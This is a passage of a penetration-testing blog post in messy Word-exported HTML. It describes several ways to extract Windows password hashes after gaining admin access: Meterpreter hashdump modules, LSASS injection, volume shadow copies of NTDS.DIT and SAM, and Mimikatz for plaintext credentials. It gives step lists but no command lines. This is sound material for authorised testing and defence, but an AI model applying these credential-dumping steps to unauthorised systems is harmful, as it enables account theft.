<!--[if !supportLists]--><span style="font-family: Verdana, sans-serif;"><span style="mso-list: Ignore;">3)<span style="font-size: 7pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;">
</span></span><!--[endif]-->Client formulates/sends a response by:<o:p></o:p></span></div>
<div class="normalCxSpMiddle" style="margin-left: 1.0in; mso-add-space: auto; mso-list: l3 level2 lfo4; text-indent: -17.95pt;">
<!--[if !supportLists]--><span style="font-family: Verdana, sans-serif;"><span style="mso-list: Ignore;">a)<span style="font-size: 7pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;">
</span></span><!--[endif]-->Creating an HMAC-MD5 string using the username, domain
name, and NT hash as a key.<span style="mso-spacerun: yes;"> </span>This result
is called the NTLMv2 one way function (OWF)<o:p></o:p></span></div>
<div class="normalCxSpMiddle" style="margin-left: 1.0in; mso-add-space: auto; mso-list: l3 level2 lfo4; text-indent: -17.95pt;">
<!--[if !supportLists]--><span style="font-family: Verdana, sans-serif;"><span style="mso-list: Ignore;">b)<span style="font-size: 7pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;">
</span></span><!--[endif]-->Combining the HMAC-MD5 string, server challenge,
timestamp, and client challenge into a response. </span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="normal">
<span style="font-family: Verdana, sans-serif;"><o:p></o:p></span></div>
<h2>
<b style="mso-bidi-font-weight: normal;"><span style="font-family: Verdana, sans-serif; font-size: large;">Obtaining
Hashes during a Penetration Test</span></b></h2>
<div class="normal">
<span style="font-family: Verdana, sans-serif;">In a post exploitation scenario, and assuming you have
administrative access, it is useful to be able to retrieve the hashed
representation of passwords. Windows hashed passwords are stored in the
Security Accounts Manager (SAM) registry hive which is a file named
“%SystemRoot%\System32\Config\SAM”.<span style="mso-spacerun: yes;"> </span>By
default, the SAM file is locked on a running system, and inaccessible to all
users including administrative users.<span style="mso-spacerun: yes;"> </span>If
an NT file system recovery was performed in the past, and the Administrator has
not removed the backup data, you might be able to find the SAM file in the
“%SystemRoot%\repair” directory.<o:p></o:p></span></div>
<div class="normal">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="normal">
<span style="font-family: Verdana, sans-serif;">Since you cannot read the file directly on the disk volume,
there are a few alternative tricks to get hold of the data.<span style="mso-spacerun: yes;"> </span>The local security authentication sub-system
process (LSASS.EXE) on a running windows system reads this data and caches it
in memory.<o:p></o:p></span></div>
<div class="normal">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<h3>
<span style="font-family: Verdana, sans-serif;">
Method 1: Meterpreter “hashdump” command </span></h3>
<div class="normal">
<span style="font-family: Verdana, sans-serif;"><o:p></o:p></span></div>
<div class="normal">
<span style="font-family: Verdana, sans-serif;">The hashdump command is an in-memory version of “pwdump”.<span style="mso-spacerun: yes;"> </span>Hashdump allocates memory inside the LSASS
process, injects assembly code, and executes it using the CreateThread()
function.<span style="mso-spacerun: yes;"> </span>The injected assembly code is
designed to read the hashes out of LSASS memory, and print them out.<span style="mso-spacerun: yes;"> </span>No files are written to disk, thus detecting
the technique without using memory forensic techniques is difficult.<o:p></o:p></span></div>
<div class="normal">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="normal">
<span style="font-family: Verdana, sans-serif;">In January, 2010, HD Moore noted that Anti-Virus, and host
intrusion prevention (HIPS) vendors had developed techniques to detect the API
calls made by the meterpreter hashdump command, and block the calls.<span style="mso-spacerun: yes;"> </span>In the process of detection however, LSASS
will often crash leading to system instability.<o:p></o:p></span></div>
<div class="normal">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<h3>
<span style="font-family: Verdana, sans-serif;">
Method 2: Meterpreter “hashdump” post module</span></h3>
<div class="normal">
<span style="font-family: Verdana, sans-serif;">The hashdump post module (post/windows/gather/hashdump.rb) uses
a registry based technique to directly access the SYSKEY, and decrypt the raw
LANMAN, and NT hashes.<span style="mso-tab-count: 1;"> </span>The
significant advantage of this technique is that there is no in-memory
manipulation of LSASS with its potential for instability.<o:p></o:p></span></div>
<div class="normal">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="normal">
<span style="font-family: Verdana, sans-serif;">The caveat is that a SYSTEM token is required to use the
technique.<span style="mso-spacerun: yes;"> </span>An account in the local
administrators group does not have read access to the SAM registry tree that
contains the hashes.<span style="mso-spacerun: yes;"> </span>If you have
exploited a system service, or perhaps something like a DCERPC vulnerability,
you are in great shape.<span style="mso-spacerun: yes;"> </span>Alternatively
you can consider migrating your meterpreter to a service process, or load the
incognito module, and impersonate a token.<o:p></o:p></span></div>
<div class="normal">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<h3>
<span style="font-family: Verdana, sans-serif;">
Method 3: Meterpreter “smart_hashdump” post
module</span></h3>
<div class="normal">
<span style="font-family: Verdana, sans-serif;">Carlos Perez improved further on the hash extraction techniques
in the sense of automating some of the additional steps, and logic required
before the actual hashes are extracted.<span style="mso-spacerun: yes;">
</span>The “smart_hashdump” post module works as follows:</span><br />
<span style="font-family: Verdana, sans-serif;">
</span><br />
<ul>
<li><span style="background-color: white; color: #333333; font-family: Verdana, sans-serif; line-height: 136%; text-indent: -17.95pt;">Determine the
privilege level, operating system, and test if the target is a domain
controller</span></li>
<li><span style="font-family: Verdana, sans-serif;"><span style="background: white; color: #333333; line-height: 136%; text-indent: -17.95pt;"><span style="font-size: 7pt; line-height: normal;"> </span></span><span style="background: white; color: #333333; line-height: 136%; text-indent: -17.95pt;">If you have the
right privileges, specifically a SYSTEM token, smart_hashdump will read the
hashes from the SAM registry hive.</span></span></li>
<li><span style="background-color: white; color: #333333; font-family: Verdana, sans-serif; line-height: 136%; text-indent: -17.95pt;">If the system is a
Domain Controller, smart_hashdump will always inject assembly code into LSASS
to obtain hashes.</span></li>
<li><span style="background-color: white; color: #333333; font-family: Verdana, sans-serif; line-height: 136%; text-indent: -17.95pt;">If the target is a
Windows 2008 server, and the process has administrative privileges,
smart_hashdump will:</span></li>
<ul>
<li><span style="background: white; color: #333333; font-family: Verdana, sans-serif; line-height: 136%; text-indent: -17.95pt;">Attempt to gain
SYSTEM by using “getsystem”.</span></li>
<li><span style="background: white; color: #333333; font-family: Verdana, sans-serif; line-height: 136%; text-indent: -17.95pt;">If it fails to get
system, smart_hashdump will attempt to automatically migrate to a process that
has system privileges.</span></li>
<li><span style="background-color: white; color: #333333; font-family: Verdana, sans-serif; line-height: 136%; text-indent: -17.95pt;">Inject the LSASS
process with assembly code to dump the hashes</span></li>
</ul>
<li><span style="font-family: Verdana, sans-serif;"><span style="background-color: white; color: #333333; line-height: 136%; text-indent: -17.95pt;">If the target is a
Windows 7+ system with UAC disabled and the process has administrative
privileges, smart_hashdump will run “getsystem” and use the registry reading
method.</span><span style="background-color: white; color: #333333; line-height: 136%; text-indent: -17.95pt;">If the target is a
Windows 2000/2003/XP system, “getsystem” will be used followed by the registry
reading method.</span></span></li>
</ul>
</div>
<div class="normalCxSpMiddle" style="line-height: 136%; margin-bottom: 8.0pt; margin-left: 55.0pt; margin-right: 0in; margin-top: 0in; mso-add-space: auto; mso-list: l5 level1 lfo2; text-indent: -17.95pt;">
<span style="font-family: Verdana, sans-serif;"><o:p></o:p></span></div>
<div class="normal" style="line-height: 136%; margin-bottom: 8.0pt;">
<span style="background: white; color: #333333; font-family: Verdana, sans-serif; mso-highlight: white;">The take home point
with “smart_hashdump” is that it will do the work for you to obtain SYSTEM
privilege and prefer reading the SAM registry hive if at all possible.<span style="mso-spacerun: yes;"> </span>The downside with this and all methods, is
that within the context of a Domain Controller, you are still required to
inject assembly code into LSASS in order to obtain hashes.<span style="mso-spacerun: yes;"> </span>As pointed out above, this is a dangerous
technique and can result in a crash which your client would certainly not
appreciate.</span></div>
<h3 style="line-height: 136%; margin-bottom: 8.0pt;">
<span style="font-family: Verdana, sans-serif;">
Method
4: Extract hashes from Volume Shadow Copies of the file system</span></h3>
<h2 style="line-height: 136%; margin-bottom: 8.0pt;">
<span style="font-family: Verdana, sans-serif;"><a href="https://www.blogger.com/null" name="h.mrcqtx5xjhzy"></a><o:p></o:p></span></h2>
<div class="normal">
<span style="font-family: Verdana, sans-serif;">In 2011, Tim Tomes, and Mark Baggett were performing research
on the topic of hiding malware in Volume Shadow Copies.<span style="mso-spacerun: yes;"> </span>As a result of this work, they realized that
by creating a volume shadow copy, or using a pre-existing volume shadow copy,
the NTDS.DIT, SAM and SYSTEM files could be directly copied from a running
system.<o:p></o:p></span></div>
<div class="normal">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="normal">
<span style="font-family: Verdana, sans-serif;">In summary, the process involves:<o:p></o:p></span></div>
<div class="normalCxSpMiddle" style="margin-left: .5in; mso-add-space: auto; mso-list: l0 level1 lfo5; text-indent: -17.95pt;">
<!--[if !supportLists]--><span style="font-family: Verdana, sans-serif;"><span style="mso-list: Ignore;">●<span style="font-size: 7pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;">
</span></span><!--[endif]-->Creating a volume shadow copy using system tool
“vssadmin” or Tim’s visual basic script called “Vssown.vbs”<o:p></o:p></span></div>
<div class="normalCxSpMiddle" style="margin-left: .5in; mso-add-space: auto; mso-list: l0 level1 lfo5; text-indent: -17.95pt;">
<!--[if !supportLists]--><span style="font-family: Verdana, sans-serif;"><span style="mso-list: Ignore;">●<span style="font-size: 7pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;">
</span></span><!--[endif]-->Downloading the NTDS.DIT, SAM, and SYSTEM files<o:p></o:p></span></div>
<div class="normalCxSpMiddle" style="margin-left: .5in; mso-add-space: auto; mso-list: l0 level1 lfo5; text-indent: -17.95pt;">
<!--[if !supportLists]--><span style="font-family: Verdana, sans-serif;"><span style="mso-list: Ignore;">●<span style="font-size: 7pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;">
</span></span><!--[endif]-->Downloading and compiling tools from <a href="http://www.ntdsxtract.com/downloads/ntds_dump_hash.zip"><span style="background: white; color: #41a0d6; mso-highlight: white; text-decoration: none; text-underline: none;">http://www.ntdsxtract.com/downloads/ntds_dump_hash.zip</span></a><o:p></o:p></span></div>
<div class="normalCxSpMiddle" style="margin-left: .5in; mso-add-space: auto; mso-list: l0 level1 lfo5; text-indent: -17.95pt;">
<!--[if !supportLists]--><span style="font-family: Verdana, sans-serif;"><span style="mso-list: Ignore;">●<span style="font-size: 7pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;">
</span></span><!--[endif]-->Using <b style="mso-bidi-font-weight: normal;"><i style="mso-bidi-font-style: normal;"><span style="background: white; color: #333333; mso-highlight: white;">esedbdumphash</span></i></b><span style="background: white; color: #333333; mso-highlight: white;"> to extract the database from NTDS.DIT</span><o:p></o:p></span></div>
<div class="normalCxSpMiddle" style="margin-left: .5in; mso-add-space: auto; mso-list: l0 level1 lfo5; text-indent: -17.95pt;">
<!--[if !supportLists]--><span style="font-family: Verdana, sans-serif;"><span style="background: white; color: #333333; mso-highlight: white;"><span style="mso-list: Ignore;">●<span style="font-size: 7pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;">
</span></span></span><!--[endif]--><span style="background: white; color: #333333; mso-highlight: white;">Using <b style="mso-bidi-font-weight: normal;"><i style="mso-bidi-font-style: normal;">dsdump.py</i></b>, or <b style="mso-bidi-font-weight: normal;"><i style="mso-bidi-font-style: normal;">bkhive2</i></b>, and <b style="mso-bidi-font-weight: normal;"><i style="mso-bidi-font-style: normal;">samdump2</i></b>
to dump hashes.<o:p></o:p></span></span></div>
<div class="normal">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="normal">
<span style="font-family: Verdana, sans-serif;"><span style="background: white; color: #333333; mso-highlight: white;">The
largest single advantage with using an offline method to extract hashes after
copying from a volume shadow is the fact that you do not have to inject
anything into the LSASS process on a running domain controller.<span style="mso-spacerun: yes;"> </span>The disadvantage is that in a larger
environment, you are faced with exfiltrating some potentially large files, and
downloading them for analysis.<span style="mso-spacerun: yes;"> </span>It is
possible that network defenders might detect the network activity of a large
data transfer, and/or a large file being written to disk on a workstation.</span><o:p></o:p></span></div>
<div class="normal">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<h2>
<span style="font-family: Verdana, sans-serif; font-size: large;">Choosing the right tool for the job</span></h2>
<div class="normal" style="line-height: 136%; margin-bottom: 8.0pt;">
<span style="font-family: Verdana, sans-serif;"><span style="background: white; color: #333333; mso-highlight: white;">
Which method of hash extraction you decide to use depends on the context of
your test.<span style="mso-spacerun: yes;"> </span>If you are dealing with an
individual system that is not a domain controller, then the “smart_hashdump”
module is a good solid choice.<span style="mso-spacerun: yes;"> </span>If you
are working with host based IPS or Anti-Virus that is detecting LSASS injection
attempts, you are taking a significant risk when injecting assembly into this
process.<span style="mso-spacerun: yes;"> </span>In the context of a domain
controller, a volume shadow copy extraction is the best approach to ensure
stability.<span style="mso-spacerun: yes;"> </span>It is apparent that the
original LSASS injection process in meterpreter can be risky, and should
probably be avoided.</span><o:p></o:p></span></div>
<div class="normal" style="line-height: 136%; margin-bottom: 8.0pt;">
<span style="background: white; color: #333333; font-family: Verdana, sans-serif; mso-highlight: white;">While this article
focuses on hashes, it would be remiss not to mention that LSASS also caches
some plaintext data for other security service providers.<span style="mso-spacerun: yes;"> </span>These include WDigest for HTTP
authentication, Kerberos, and Terminal Services.<span style="mso-spacerun: yes;"> </span>If you have administrative access on a local
system, LSASS plaintext security service provider memory can be accessed using
the Mimikatz or Kiwi extensions enabling the extraction of plaintext
information to screen.<span style="mso-spacerun: yes;"> </span>Kiwi can be
thought of as the upgraded (version 2) release of Mimikatz and includes some
excellent new functionality.</span><br />
<span style="background: white; color: #333333; font-family: Verdana, sans-serif; mso-highlight: white;"><br /></span></div>
<h2 style="line-height: 136%; margin-bottom: 8.0pt;">
<span style="font-family: Verdana, sans-serif; font-size: large;">
References</span></h2>
<h1 style="line-height: 136%; margin-bottom: 8.0pt;">
<span style="font-family: Verdana, sans-serif;"><a href="https://www.blogger.com/null" name="h.vca3vv9yxp3i"></a><o:p></o:p></span></h1>
<div class="normalCxSpFirst" style="margin-left: .5in; mso-add-space: auto; mso-list: l1 level1 lfo3; text-indent: -17.95pt;">
<!--[if !supportLists]--><span style="font-family: Verdana, sans-serif;"><span style="mso-list: Ignore;">●<span style="font-size: 7pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;">
</span></span><!--[endif]--><a href="http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html"><span style="color: #1155cc;">http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html</span></a><o:p></o:p></span></div>
<div class="normalCxSpMiddle" style="margin-left: .5in; mso-add-space: auto; mso-list: l1 level1 lfo3; text-indent: -17.95pt;">
<!--[if !supportLists]--><span style="font-family: Verdana, sans-serif;"><span style="mso-list: Ignore;">●<span style="font-size: 7pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;">
</span></span><!--[endif]--><a href="http://web.textfiles.com/hacking/sam_files.txt"><span style="color: #1155cc;">http://web.textfiles.com/hacking/sam_files.txt</span></a>
<o:p></o:p></span></div>
<div class="normalCxSpMiddle" style="margin-left: .5in; mso-add-space: auto; mso-list: l1 level1 lfo3; text-indent: -17.95pt;">
<!--[if !supportLists]--><span style="font-family: Verdana, sans-serif;"><span style="mso-list: Ignore;">●<span style="font-size: 7pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;">
</span></span><!--[endif]--><a href="http://www.darkoperator.com/blog/2011/5/19/metasploit-post-module-smart_hashdump.html"><span style="color: #1155cc;">http://www.darkoperator.com/blog/2011/5/19/metasploit-post-module-smart_hashdump.html</span></a>
<o:p></o:p></span></div>
<div class="normalCxSpMiddle" style="margin-left: .5in; mso-add-space: auto; mso-list: l1 level1 lfo3; text-indent: -17.95pt;">
<!--[if !supportLists]--><span style="font-family: Verdana, sans-serif;"><span style="mso-list: Ignore;">●<span style="font-size: 7pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;">
</span></span><!--[endif]--><a href="https://community.rapid7.com/community/metasploit/blog/2010/01/01/safe-reliable-hash-dumping"><span style="color: #1155cc;">https://community.rapid7.com/community/metasploit/blog/2010/01/01/safe-reliable-hash-dumping</span></a>
<o:p></o:p></span></div>
<div class="normal">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<!--[if gte mso 9]><xml>
<o:DocumentProperties>
<o:Revision>0</o:Revision>
<o:TotalTime>0</o:TotalTime>
<o:Pages>1</o:Pages>
<o:Words>1504</o:Words>
<o:Characters>8573</o:Characters>
<o:Company>NWN</o:Company>
<o:Lines>71</o:Lines>
<o:Paragraphs>20</o:Paragraphs>
<o:CharactersWithSpaces>10057</o:CharactersWithSpaces>
<o:Version>14.0</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:View>Normal</w:View>
<w:Zoom>0</w:Zoom>
<w:TrackMoves/>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:DoNotPromoteQF/>
<w:LidThemeOther>EN-US</w:LidThemeOther>
<w:LidThemeAsian>JA</w:LidThemeAsian>
<w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:SnapToGridInCell/>
<w:WrapTextWithPunct/>
<w:UseAsianBreakRules/>
<w:DontGrowAutofit/>
<w:SplitPgBreakAndParaMark/>
<w:EnableOpenTypeKerning/>
<w:DontFlipMirrorIndents/>
<w:OverrideTableStyleHps/>
</w:Compatibility>
<m:mathPr>
<m:mathFont m:val="Cambria Math"/>
<m:brkBin m:val="before"/>
<m:brkBinSub m:val="--"/>
<m:smallFrac m:val="off"/>
<m:dispDef/>
<m:lMargin m:val="0"/>
<m:rMargin m:val="0"/>
<m:defJc m:val="centerGroup"/>
<m:wrapIndent m:val="1440"/>
<m:intLim m:val="subSup"/>
<m:naryLim m:val="undOvr"/>
</m:mathPr></w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="276">
<w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
<w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
<w:LsdException Locked="false" Priority="0" QFormat="true" Name="heading 2"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
<w:LsdException Locked="false" Priority="39" Name="toc 1"/>
<w:LsdException Locked="false" Priority="39" Name="toc 2"/>
<w:LsdException Locked="false" Priority="39" Name="toc 3"/>
<w:LsdException Locked="false" Priority="39" Name="toc 4"/>
<w:LsdException Locked="false" Priority="39" Name="toc 5"/>
<w:LsdException Locked="false" Priority="39" Name="toc 6"/>
<w:LsdException Locked="false" Priority="39" Name="toc 7"/>
<w:LsdException Locked="false" Priority="39" Name="toc 8"/>
<w:LsdException Locked="false" Priority="39" Name="toc 9"/>
<w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/>
<w:LsdException Locked="false" Priority="10" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Title"/>
<w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
<w:LsdException Locked="false" Priority="11" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
<w:LsdException Locked="false" Priority="22" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
<w:LsdException Locked="false" Priority="20" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
<w:LsdException Locked="false" Priority="59" SemiHidden="false"
UnhideWhenUsed="false" Name="Table Grid"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
<w:LsdException Locked="false" Priority="1" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 1"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
